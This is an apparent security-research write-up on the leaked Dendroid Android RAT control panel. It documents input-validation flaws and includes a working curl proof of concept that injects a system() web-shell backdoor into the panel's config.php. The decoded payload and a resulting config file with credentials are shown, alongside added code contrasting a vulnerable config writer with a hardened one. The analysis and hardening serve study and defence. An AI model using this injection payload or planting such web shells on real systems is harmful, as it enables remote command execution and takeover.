On Friday, the full source code of the Dendroid Remote Access Trojan (RAT) was leaked. Dendroid is a popular crimeware package that targets Android devices and is sold on underground forums for $300. The source code of botnet control panels is usually shipped encrypted (obfuscated), so it was surprising to find the full, readable source of the Dendroid control panel included in the leaked files. Analyzing the leaked code revealed multiple vulnerabilities caused by a lack of user input validation, including Cross-Site Scripting (XSS), Arbitrary File Upload, SQL Injection, and PHP Code Execution.
The Dendroid crimeware kit includes an application package file (APK) builder and a website panel to control infected devices. The builder allows the attacker to easily incorporate the Dendroid RAT into legitimate Android apps. There are multiple actions the botnet master can enact on a Dendroid-infected device including:
- Downloading and uploading of files
- Controlling the camera and microphone
- Intercepting and/or blocking SMS texts
- Accessing browser data (history/bookmarks)
- Harvesting call data, contacts, etc.
- Opening installed applications
The lack of user input validation in Dendroid's control panel is severe, especially given how much operational security even a small crimeware campaign depends on: anyone who can reach the panel can take it over.
Unsanitized user input is written to the Panel/config.php file via POST requests to the Panel/applysettings.php file. Because config.php is itself PHP source, this allows PHP code to be injected and then executed on subsequent requests to the Panel/config.php URL. Rewriting this configuration file not only allows execution of specially crafted PHP code, but also renders the control panel inoperable, effectively creating a Denial of Service condition.
Here is one proof of concept that plants a backdoor reading the GET parameter "c" and passing it to system() for command execution:
curl -d "timezone=%27%3B%24s%3D%24_GET%5B%27c%27%5D%3Bsystem%28%24s%29%3Bdie%28%29%3B%24s%3D%27" -d "postboxsize=1" -d "botoffline=1" 'dendroid.local/Panel/applysettings.php'
Let's break down each of these POST parameters to show what they do. Curl is instructed to send a POST request in which the timezone parameter carries the following string (percent-encoded so that the shell does not expand $s and the quotes survive intact; PHP decodes it on arrival):
';$s=$_GET['c'];system($s);die();$s='
This value is then written into Panel/config.php (line 13 of the generated file). The leading single quote closes the string literal that the panel opens, and the trailing `$s='` reopens one so that the panel's own closing quote and semicolon still parse, leaving syntactically valid PHP:
$timezonesetting='';$s=$_GET['c'];system($s);die();$s='';
The other POST values, postboxsize and botoffline, are assigned the integer values the panel expects so PHP does not throw any errors when the file is parsed. After exploitation, Panel/config.php contains the contents below. Notice that the database connection settings (dbhost, dbname, dbuser) now hold empty strings, which stops the control panel from functioning:
$dbhost='';
$dbname='';
$dbuser='';
$dbpass='satu5ama3';
$username='';
$password='74dfc2b27acfa364da55f93a5caee29ccad3557247eda238831b3e9bd931b01d77fe994e4f12b9d4cfa92a124461d2065197d8cf7f33fc88566da2db2a4d6eae';
$postboxtextsize=1;
$devicestablerefreshspeed=0;
$filestablerefreshspeed=0;
$messageboxrefreshspeed=0;
$offlineminutes=1;
$timezonesetting='';$s=$_GET['c'];system($s);die();$s='';
$autoscrolltextbox=false;
?>
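The following is an added example, not code from the leaked Dendroid panel, that reconstructs the config-writing pattern described above in a minimal form and places it beside a hardened version. The function names, the subset of settings and the exact layout of the generated file are assumptions; only the injected payload and the resulting $timezonesetting line are taken from the post.

```php
<?php
// Added example, not Dendroid's own code. A minimal stand-in for the
// pattern described above: settings arrive via POST and are spliced into
// Panel/config.php as PHP source. Function names, the settings subset and
// the file layout are assumed, not copied from the leaked panel.

// Vulnerable writer: values are concatenated straight into PHP source.
// A single quote inside $timezone closes the string literal, so whatever
// follows is parsed as code the next time config.php is loaded.
function build_config_vulnerable(array $post): string {
    $timezone = $post['timezone'];
    $postbox  = $post['postboxsize'];
    $offline  = $post['botoffline'];
    return "<?php\n"
        . "\$postboxtextsize=" . $postbox . ";\n"
        . "\$offlineminutes=" . $offline . ";\n"
        . "\$timezonesetting='" . $timezone . "';\n"
        . "?>";
}

// Hardened writer: user input may decide values, never the shape of the
// code. The timezone is checked against PHP's own identifier list,
// integers are validated with a range, and strings are emitted through
// var_export(), which escapes quotes and backslashes so the value can
// only ever be data. Rejecting a bad value also prevents the DoS side
// effect of writing an unusable config file.
function build_config_hardened(array $post): string {
    $timezone = $post['timezone'] ?? 'UTC';
    if (!in_array($timezone, DateTimeZone::listIdentifiers(), true)) {
        throw new InvalidArgumentException('unknown timezone');
    }
    $postbox = filter_var($post['postboxsize'] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => 100]]);
    $offline = filter_var($post['botoffline'] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => 1440]]);
    if ($postbox === false || $offline === false) {
        throw new InvalidArgumentException('integer setting out of range');
    }
    return "<?php\n"
        . "\$postboxtextsize=" . var_export($postbox, true) . ";\n"
        . "\$offlineminutes=" . var_export($offline, true) . ";\n"
        . "\$timezonesetting=" . var_export($timezone, true) . ";\n"
        . "?>";
}

// The decoded payload from the curl proof of concept above, as PHP would
// see it in $_POST after percent-decoding.
$payload = [
    'timezone'    => "';\$s=\$_GET['c'];system(\$s);die();\$s='",
    'postboxsize' => '1',
    'botoffline'  => '1',
];

echo "--- vulnerable writer ---\n";
// The $timezonesetting line of this output is the injected backdoor.
echo build_config_vulnerable($payload), "\n\n";

echo "--- hardened writer, same payload ---\n";
try {
    echo build_config_hardened($payload), "\n";
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}

echo "\n--- hardened writer, legitimate input ---\n";
echo build_config_hardened([
    'timezone'    => 'Europe/London',
    'postboxsize' => '1',
    'botoffline'  => '1',
]), "\n";
```

Run it with `php example.php` and compare the two generated files. var_export() is the minimum fix for this code path; a cleaner design stores settings in the database or a JSON file that the panel reads as data, so that no request can ever change the PHP that the server executes.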
The backdoor shell can now be used by passing a system command in the GET parameter "c" on a request to Panel/config.php; the die() call stops the script right after the command runs, so only its output is returned. The original post shows this with the whoami command:
[Screenshot: example using the "whoami" system command]
In the past, malware source code leaks have spawned several variants and led to more widespread use of the crimeware features that made the original malware desirable. When the source code for the Zeus Trojan was leaked in 2011, for example, it accelerated the proliferation of features designed to bypass online banking security measures.
Judging by the quality of the source code, Dendroid is clearly not on par with Zeus or other advanced Trojans. That said, it would be very surprising if the Dendroid leak did not lead to more widespread use of this Android malware and its future variants.